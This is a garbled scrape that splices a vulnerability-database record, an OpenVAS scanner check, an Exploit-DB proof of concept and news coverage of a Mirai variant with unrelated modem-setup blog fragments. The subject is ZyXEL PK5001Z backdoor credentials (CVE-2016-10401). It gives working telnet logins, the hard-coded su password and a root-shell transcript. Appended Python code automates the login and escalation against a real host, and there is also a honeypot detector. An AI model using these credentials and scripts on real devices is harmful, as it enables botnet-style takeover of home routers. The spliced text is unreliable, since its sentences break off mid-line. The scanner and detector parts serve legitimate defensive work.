", "published": "2017-11-02T00:00:00", "modified": "2019-09-06T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112100", "reporter": "This script is Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/43105/", "https://www.reddit.com/r/centurylink/comments/5lt07r/zyxel_c1100z_default_lanside_telnet_login/", "https://thehackernews.com/2017/11/mirai-botnet-zyxel.html", "https://forum.openwrt.org/viewtopic.php?id=62266"], "cvelist": ["CVE-2016-10401"], "lastseen": "2019-09-09T15:17:17", "viewCount": 1829, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-10401"]}, {"type": "threatpost", "idList": ["THREATPOST:6E693403866ABC7ED2D08FC5260228A7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144851"]}, {"type": "thn", "idList": ["THN:B9EAC52AD9207F731418E005089C2AF5"]}, {"type": "zdt", "idList": ["1337DAY-ID-28943"]}, {"type": "exploitdb", "idList": ["EDB-ID:43105"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:91618FCF772C95FA8F74734914A599E7"]}], "modified": "2019-09-09T15:17:17", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2019-09-09T15:17:17", "rev": 2}, "vulnersScore": 8.0}, "pluginID": "1361412562310112100", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZyXEL Modems Backup Telnet Account and Default Root Credentials\n#\n# Authors:\n# Adrian Steins \n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. telnet 192.168.0.1 Bottom Line: Here’s how to get your PPP password for a Zyxel C1000Z modem so you can put it into bridge mode and use your router instead. Step 7: Go back to the TELNET setting on GUI.Disable the TELNET service to secure the device. over three years, ZyXEL is a global-provider of equipment supporting dual-stack IP networks and provides this feature on many current ZyXEL products, including the C1100Z. banner )\n exit( 0 );\n\nif( \"PK5001Z login:\" >< banner || \"BCM963268 Broadband Router\" >< banner ) found = TRUE;\n\nif ( found ) {\n\n login = \"admin\";\n passwords = make_list( \"CenturyL1nk\", \"CentryL1nk\", \"QwestM0dem\" );\n root_pass = \"zyad5001\";\n\n report = 'The following issues have been found:\\n';\n\n foreach pass( passwords ) {\n soc = open_sock_tcp( port );\n if( ! My first attempt was going through the modem configuration pages, where I saw the spaces to input PPP info, with the password obscured by asterisks. Brought to you by Nathan Henrie. Just had the installer drop off my new ZyXel C1100z modem and enable service.

Because the modem generally does the PPP authentication, that’s where we have to look for the credentials. \n \n**3\\. Unfortunately, decoding it only left me with Salted__bunchofoddcharacters… which didn’t work at all, since I didn’t know their salt or what algorithm they were using. \n \n**2\\. I recently changed from internet service providers from Comcast to CenturyLink. Connect an Ethernet cable from a LAN port on the ZyXel router to a LAN port on the Airport. The new variant adds more devices to this list. The largest of such attacks flooded [DNS provider Dyn]() causing several well-known websites \u2013 Twitter, Spotify and Netflix \u2013 to go dark for hours.\n\nNetlab said that this new Mirai variant is actively leveraging two new credentials, admin/CenturyL1nk and admin/QwestM0dem, identified in an [exploit database last month]().\n\n[! {"id": "OPENVAS:1361412562310112100", "type": "openvas", "bulletinFamily": "scanner", "title": "ZyXEL Modems Backup Telnet Account and Default Root Credentials", "description": "ZyXEL PK5001Z and C1100Z modems have default root credentials set and a backdoor account with hard-coded credentials. Finally, I ran across a few links that were instrumental to me figuring everything out: Basically, I followed their instructions to turn on telnet access (making sure to turn it off again afterwards), and ran the below commands (either / or — they should give you the same password). \n \nThe targeted port scans are actively looking for vulnerable internet-connected devices manufactured by ZyXEL Communications using two default telnet credential combinations\u2014**admin/CentryL1nk** and **admin/QwestM0dem**\u2014to gain root privileges on the targeted devices. \nEscape character is '^]'. \n\n\n[! Exactly a year before, [millions of Zyxel routers]() were found vulnerable to a critical remote code execution flaw, which was exploited by Mirai. 
Overall, I’m pleased with the change (mostly because I’m paying about 1/3 the price for a negligible difference in speed — and I was finally able to turn in all that Comcast TV equipment that’s been sitting in my closet for the last 3 years).

[](https://media.threatpost.com/wp-content/uploads/sites/103/2017/11/06222054/1_time_curve_of_two_new_credential_in_honeypot.png)]()\n\nTwo new credentials being actively abused.\n\nResearchers said adversaries have automated the process of logging into ZyXEL devices using telnet credentials and coupled that with a separate hard coded superuser vulnerability ([CVE-2016-10401]()) to gain root privileges on targeted devices.\n\n\u201cZyXEL PK5001Z devices have zyad5001 as the su (superuser) password, which makes it easier for remote attackers to obtain root access if a non-root account password is known (or a non-root default account exists within an ISP\u2019s deployment of these devices),\u201d according to the CVE description of the vulnerability.\n\nSpeaking with the publication Bleeping Computer, Netlab researchers said there has been a spike by attackers leveraging publicly disclosed details of the exploit since it was released in October.\n\n\u201cThe PoC published last month automates the process of logging into a remote ZyXEL device using one of the two telnet passwords, and then uses the hardcoded su password to gain root privileges,\u201d researchers told the Bleepining Computer website.\n\nAccording to Qihoo 360 researchers, the abuse of these two credentials began on Nov. 22 and reached its peak the next morning. The past firmware did not have this feature and simply allowed you to login via ssh/telnet and then type 'sh' to drop into a simple Busybox shell. sh \n \n\n\n### Secure Your (Easily Hackable) Internet-Connected Devices\n\n \n**1\\. But I’m not writing to talk about CenturyLink, I’m writing to show others how I was finally able to get my PPP password from my CenturyLink modem for use with my new(ish) router: an Apple Airport Extreme. www.zyxel.com Step 6: Enter the CLI command “write” to save the configuration changes. So, naturally, first thing I Telnet'd in. 
[iot-botnet](https://2.bp.blogspot.com/--ucFyeWzuEQ/Wh1xHvg61YI/AAAAAAAAu9c/B-o05G3mdes92AVCUsl3bA_82puiwEMwACLcBGAs/s1600/iot-botnet.png)]()\n\n \nMirai-based attacks experienced sudden rise after someone publicly released its[ source code]() in October 2016. Being a Python guy, I initially did this: but I later realized I could have saved myself some typing and just done this: Once I had my decoded password, I plugged it into my Airport Extreme with the username from the XML config file lastname_firstname@qwest.net and it worked like a charm. I recently changed from internet service providers from Comcast to CenturyLink. \r\n# Linked CVE's: CVE-2016-10401\r\n \r\n \r\nHardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet\r\n \r\nusername: admin\r\npassword: CenturyL1nk\r\n \r\nEscalate to root with 'su' and this password.\r\n\r\npassword: zyad5001\r\n\r\n\r\n[root:/]# telnet 192.168.0.1\r\nTrying 192.168.0.1...\r\nConnected to 192.168.0.1.\r\nEscape character is '^]'.\r\n\r\nPK5001Z login: admin\r\nPassword: CenturyL1nk\r\n$ whoami\r\nadmin_404A03Tel\r\n$ su\r\nPassword: zyad5001\r\n# whoami\r\nroot\r\n# uname -a\r\nLinux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown\r\n# cat /etc/zyfwinfo\r\nVendor Name: ZyXEL Communications Corp.\r\n\r\n\r\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/43105/"}], "packetstorm": [{"lastseen": "2017-11-03T14:05:30", "description": "", "published": "2017-11-02T00:00:00", "type": "packetstorm", "title": "ZyXEL PK5001Z Modem Backdoor Account", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10401"], "modified": "2017-11-02T00:00:00", "id": "PACKETSTORM:144851", "href": "https://packetstormsecurity.com/files/144851/ZyXEL-PK5001Z-Modem-Backdoor-Account.html", "sourceData": "`# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet 
Password. Keep in mind; Mirai malware scans for default settings. Learn about the Zyxel C1100Z modem/router, including setup, checking modem status, wireless settings, utilities and advanced features.

Zyxel C1100Z - wireless router - DSL modem - 802.11b/g/n - desktop overview and full product specs on CNET. It has also been used in previous Mirai attacks. C1100Z 802.11n VDSL2 Wireless Gateway • 300 Mbps 802.11n access point • Standards based WPS simplifies secure WLAN setup • IPv6 6rd and dual stack support soc ) continue;\n\n recv = recv( socket:soc, length:2048 );\n\n if ( \"PK5001Z login:\" >< recv || \"Login:\" >< recv ) {\n send( socket:soc, data: tolower( login ) + '\\r\\n' );\n recv = recv( socket:soc, length:128 );\n\n if( \"Password:\" >< recv ) {\n send( socket:soc, data: pass + '\\r\\n\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n send( socket:soc, data: 'whoami\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n if( recv =~ \"admin\" ) {\n VULN = TRUE;\n report += '\\n\\nIt was possible to login via telnet using the following backup credentials:\\n';\n report += 'Login: ' + login + ', Password: ' + pass;\n }\n\n send( socket:soc, data: 'su\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n send( socket:soc, data: root_pass + '\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n send( socket:soc, data: 'cat /etc/zyfwinfo\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n if( recv =~ \"ZyXEL Communications Corp.\" ) {\n VULN = TRUE;\n report += '\\n\\nIt was possible to escalate to root privileges with the following root password: ' + root_pass;\n }\n }\n }\n\n close( soc );\n }\n\n if( VULN ) {\n security_message( port:port, data:report );\n exit( 0 );\n } else {\n exit( 99 );\n }\n}\n\nexit( 0 );\n", "naslFamily": "Default Accounts"}, {"cve": [{"lastseen": "2020-10-03T12:10:40", "description": "ZyXEL PK5001Z devices have zyad5001 as the su password, which makes it easier for remote attackers to obtain root access if a non-root account password is known (or a non-root default account exists within an ISP's deployment of these devices).
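The OpenVAS check and the Exploit-DB session above drive the same telnet exchange: login banner, `admin` with one of the backup passwords, `whoami`, then `su` with zyad5001 and `cat /etc/zyfwinfo` as the root oracle. The following is an added example (not Greenbone's NASL and not the Exploit-DB author's code) that implements that exchange in Python. `FakeModem` is a constructed in-memory emulation of the device's prompts, taken from the Exploit-DB transcript, so the check runs offline; `SocketTransport` is the raw-socket path for an authorised test against a modem you own and is an assumption about the real device (it strips telnet option negotiation rather than answering it). It departs from the NASL in two ways a practitioner would want: it stops at the first password that yields an admin shell and only then tries `su`, and it matches the `whoami` output at the start of a line so an echoed command cannot satisfy the check.

```python
"""Default-credential and su-escalation check for the ZyXEL PK5001Z telnet
service, modelled on the OpenVAS check and the Exploit-DB session.
Added example, not Greenbone's or Exploit-DB's code.  FakeModem is a
constructed emulation; SocketTransport is the (assumed) real-device path."""
import re
import socket
from dataclasses import dataclass
from typing import Callable, Optional

ADMIN_LOGIN = "admin"
BACKUP_PASSWORDS = ("CenturyL1nk", "CentryL1nk", "QwestM0dem")  # as in the NASL
SU_PASSWORD = "zyad5001"                                          # CVE-2016-10401
LOGIN_PROMPTS = ("PK5001Z login:", "Login:")
FW_MARKER = "ZyXEL Communications Corp."                          # /etc/zyfwinfo


@dataclass
class Finding:
    login_password: Optional[str] = None   # backup credential that worked, if any
    root: bool = False                     # su with the hard-coded password succeeded


class FakeModem:
    """Constructed stand-in for the PK5001Z telnet service (no command echo)."""

    def __init__(self, admin_pw: str = "CenturyL1nk", su_pw: str = SU_PASSWORD):
        self.admin_pw, self.su_pw = admin_pw, su_pw
        self.state, self.user, self.out = "login", "", "PK5001Z login: "

    def recv(self) -> str:
        data, self.out = self.out, ""
        return data

    def send(self, data: str) -> None:
        for line in data.splitlines():   # "pw\r\n\r\n" is two lines, as the NASL sends it
            self._line(line)

    def close(self) -> None:
        pass

    def _line(self, line: str) -> None:
        if self.state == "login":
            self.user, self.state, self.out = line, "password", self.out + "Password: "
        elif self.state == "password":
            if self.user == ADMIN_LOGIN and line == self.admin_pw:
                self.state, self.out = "shell", self.out + "$ "
            else:
                self.state, self.out = "login", self.out + "Login incorrect\nPK5001Z login: "
        elif self.state == "su":
            ok = line == self.su_pw
            self.state = "root" if ok else "shell"
            self.out += "# " if ok else "su: incorrect password\n$ "
        elif line == "su" and self.state == "shell":
            self.state, self.out = "su", self.out + "Password: "
        else:                                   # "shell" or "root" command prompt
            self.out += self._command(line) + ("# " if self.state == "root" else "$ ")

    def _command(self, cmd: str) -> str:
        if cmd == "whoami":
            return ("root" if self.state == "root" else "admin_404A03Tel") + "\n"
        if cmd == "cat /etc/zyfwinfo":
            return ("Vendor Name: " + FW_MARKER if self.state == "root"
                    else "cat: can't open '/etc/zyfwinfo': Permission denied") + "\n"
        return ""


class SocketTransport:
    """Raw-socket transport for a real device on port 23 (assumption: the modem
    tolerates IAC negotiation being stripped and left unanswered)."""

    def __init__(self, host: str, port: int = 23, timeout: float = 3.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)

    def recv(self) -> str:                     # read until the device goes quiet
        buf = b""
        try:
            while True:
                chunk = self.sock.recv(2048)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
        return re.sub(rb"\xff[\xfb-\xfe][\x00-\xff]|\xff\xff", b"", buf).decode("latin-1")

    def send(self, data: str) -> None:
        self.sock.sendall(data.encode("latin-1"))

    def close(self) -> None:
        self.sock.close()


def check_device(connect: Callable[[], object]) -> Finding:
    """Try each backup password; on the first admin shell, attempt su and
    confirm root through /etc/zyfwinfo.  One connection per attempt, as the NASL."""
    finding = Finding()
    for password in BACKUP_PASSWORDS:
        t = connect()
        try:
            if not any(p in t.recv() for p in LOGIN_PROMPTS):
                return finding                       # not a login banner we recognise
            t.send(ADMIN_LOGIN + "\r\n")
            if "Password:" not in t.recv():
                continue
            t.send(password + "\r\n\r\n")
            t.recv()
            t.send("whoami\r\n")
            if not re.search(r"^admin", t.recv(), re.M):  # output line, not an echo
                continue                                   # no su attempt after a failed login
            finding.login_password = password
            t.send("su\r\n")
            t.recv()
            t.send(SU_PASSWORD + "\r\n")
            t.recv()
            t.send("cat /etc/zyfwinfo\r\n")
            finding.root = FW_MARKER in t.recv()
            return finding
        finally:
            t.close()
    return finding


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else None
    make = (lambda: SocketTransport(host)) if host else (lambda: FakeModem(admin_pw="QwestM0dem"))
    print(check_device(make))
```

With no argument the script runs against the fake and reports `Finding(login_password='QwestM0dem', root=True)`; with a host argument it connects to that device, which should only be one you are authorised to test, since a successful run leaves the modem's login and su attempts in its logs and, on an unpatched unit, in a root shell that the script simply closes.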
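The `Salted__` text the blog author saw after base64-decoding the config backup is the 8-byte magic that `openssl enc` writes in front of its 8-byte salt when encrypting under a passphrase, so the salt is not the missing piece; what is missing is the passphrase, and the cipher and digest the firmware used. The following is an added example, not code from the post: it unpacks that envelope and derives a key and IV from a candidate passphrase with OpenSSL's EVP_BytesToKey (MD5, one iteration, which was the `openssl enc` default before 1.1.0; SHA-256 afterwards, and PBKDF2 only with `-pbkdf2`). The sample blob is constructed, and the key and IV sizes assume AES-256-CBC.

```python
"""Recognise and unpack the OpenSSL `enc` salted envelope
("Salted__" + 8-byte salt + ciphertext) and derive key/IV from a candidate
passphrase with EVP_BytesToKey.  Added example, not from the post; the sample
blob is constructed and AES-256-CBC (32-byte key, 16-byte IV) is an assumption."""
import base64
import hashlib
import os
from typing import Callable, Tuple

OPENSSL_MAGIC = b"Salted__"


def parse_openssl_envelope(b64_blob: str) -> Tuple[bytes, bytes]:
    """Return (salt, ciphertext) from base64 `openssl enc` output, or raise."""
    raw = base64.b64decode(b64_blob)
    if not raw.startswith(OPENSSL_MAGIC) or len(raw) < 16:
        raise ValueError("not OpenSSL 'enc' salted output")
    salt, body = raw[8:16], raw[16:]
    if not body or len(body) % 16:
        raise ValueError("ciphertext is empty or not a multiple of the 16-byte block size")
    return salt, body


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int = 32, iv_len: int = 16,
                     digest: Callable = hashlib.md5, count: int = 1) -> Tuple[bytes, bytes]:
    """OpenSSL EVP_BytesToKey: D_i = H^count(D_{i-1} || passphrase || salt),
    concatenated until key_len + iv_len bytes are available."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        d = prev + passphrase + salt
        for _ in range(count):
            d = digest(d).digest()
        out, prev = out + d, d
    return out[:key_len], out[key_len:key_len + iv_len]


def make_sample_blob(salt: bytes = bytes(range(8)), body_len: int = 32) -> str:
    """Constructed stand-in for the blob from the config backup (random body)."""
    return base64.b64encode(OPENSSL_MAGIC + salt + os.urandom(body_len)).decode()


if __name__ == "__main__":
    salt, body = parse_openssl_envelope(make_sample_blob())
    key, iv = evp_bytes_to_key(b"candidate-passphrase", salt)
    print("salt", salt.hex(), "ciphertext bytes", len(body))
    print("key", key.hex(), "iv", iv.hex())
```

A practitioner who recovers the firmware's passphrase (for instance from the binary that writes the backup) can hand the derived key and IV to `openssl enc -d -aes-256-cbc -K <hex key> -iv <hex iv>` on the ciphertext, or let `openssl enc -d -aes-256-cbc -md md5 -pass pass:<passphrase>` do the derivation itself; without it, the envelope tells you only the salt and the ciphertext length.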

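Netlab spotted the variant by watching which credential pairs turned up in its telnet honeypot over time, which is the "time curve" figure in the Threatpost piece. The following is an added example, not Netlab's code: a detector run over constructed Cowrie-style JSON events that flags the credential pairs (both spellings of the first password, since the sources disagree), buckets hits per hour to reproduce that curve, and marks sessions in which the hard-coded su password was typed afterwards. The field names (`eventid`, `username`, `password`, `src_ip`, `session`, `timestamp`, `input`) follow Cowrie's JSON log; whether a honeypot records the line typed at a `su` prompt as a command-input event is an assumption.

```python
"""Flag the ZyXEL credential pairs abused by the Mirai variant in honeypot
telnet logs and bucket the hits per hour.  Added example, not Netlab's code.
SAMPLE_LOG is constructed; the Cowrie-style field names are an assumption."""
import json
from collections import Counter
from typing import Dict, List, Tuple

# CentryL1nk (THN spelling) and CenturyL1nk (Threatpost / Exploit-DB spelling)
# are both listed because the OpenVAS check tries both.
MIRAI_ZYXEL_PAIRS = {
    ("admin", "CenturyL1nk"),
    ("admin", "CentryL1nk"),
    ("admin", "QwestM0dem"),
}
ZYXEL_SU_PASSWORD = "zyad5001"   # CVE-2016-10401

SAMPLE_LOG = """
{"eventid":"cowrie.login.success","username":"admin","password":"CentryL1nk","src_ip":"198.51.100.7","session":"a1","timestamp":"2017-11-22T23:41:10.000000Z"}
{"eventid":"cowrie.command.input","input":"su","session":"a1","timestamp":"2017-11-22T23:41:11.000000Z"}
{"eventid":"cowrie.command.input","input":"zyad5001","session":"a1","timestamp":"2017-11-22T23:41:12.000000Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.9","session":"b2","timestamp":"2017-11-22T23:50:00.000000Z"}
{"eventid":"cowrie.login.success","username":"admin","password":"QwestM0dem","src_ip":"203.0.113.20","session":"c3","timestamp":"2017-11-23T00:05:30.000000Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"QwestM0dem","src_ip":"203.0.113.21","session":"d4","timestamp":"2017-11-23T00:07:02.000000Z"}
this line is not JSON and must be skipped
{"eventid":"cowrie.login.success","username":"admin","password":"CenturyL1nk","src_ip":"192.0.2.44","session":"e5","timestamp":"2017-11-23T01:15:45.000000Z"}
"""


def parse_events(text: str):
    """Yield one dict per JSON line, skipping blank and malformed lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def analyse(text: str) -> Dict[str, object]:
    # A failed attempt with one of the pairs is still a hit: the honeypot
    # observes the scanner's credential list regardless of the outcome.
    hits: List[Tuple[str, str, str, str]] = []   # (timestamp, src_ip, session, password)
    su_sessions = set()
    for ev in parse_events(text):
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.success", "cowrie.login.failed"):
            if (ev.get("username"), ev.get("password")) in MIRAI_ZYXEL_PAIRS:
                hits.append((ev["timestamp"], ev.get("src_ip", "?"), ev["session"], ev["password"]))
        elif eid == "cowrie.command.input" and ev.get("input", "").strip() == ZYXEL_SU_PASSWORD:
            su_sessions.add(ev["session"])   # assumption: su prompt input is logged as a command
    hourly = Counter(ts[:13] for ts, _, _, _ in hits)      # "YYYY-MM-DDTHH"
    by_password = Counter(pw for _, _, _, pw in hits)
    return {
        "hits": hits,
        "hourly": dict(sorted(hourly.items())),
        "peak_hour": max(hourly, key=hourly.get) if hourly else None,
        "by_password": dict(by_password),
        "escalation_sessions": sorted({s for _, _, s, _ in hits if s in su_sessions}),
    }


if __name__ == "__main__":
    print(json.dumps(analyse(SAMPLE_LOG), indent=2))
```

On the constructed log this reports four hits, a peak in the 2017-11-23T00 hour and one session (`a1`) that went on to type the su password; on real honeypot output the same per-hour table is what distinguishes a new credential pair entering a botnet's list from a one-off manual login.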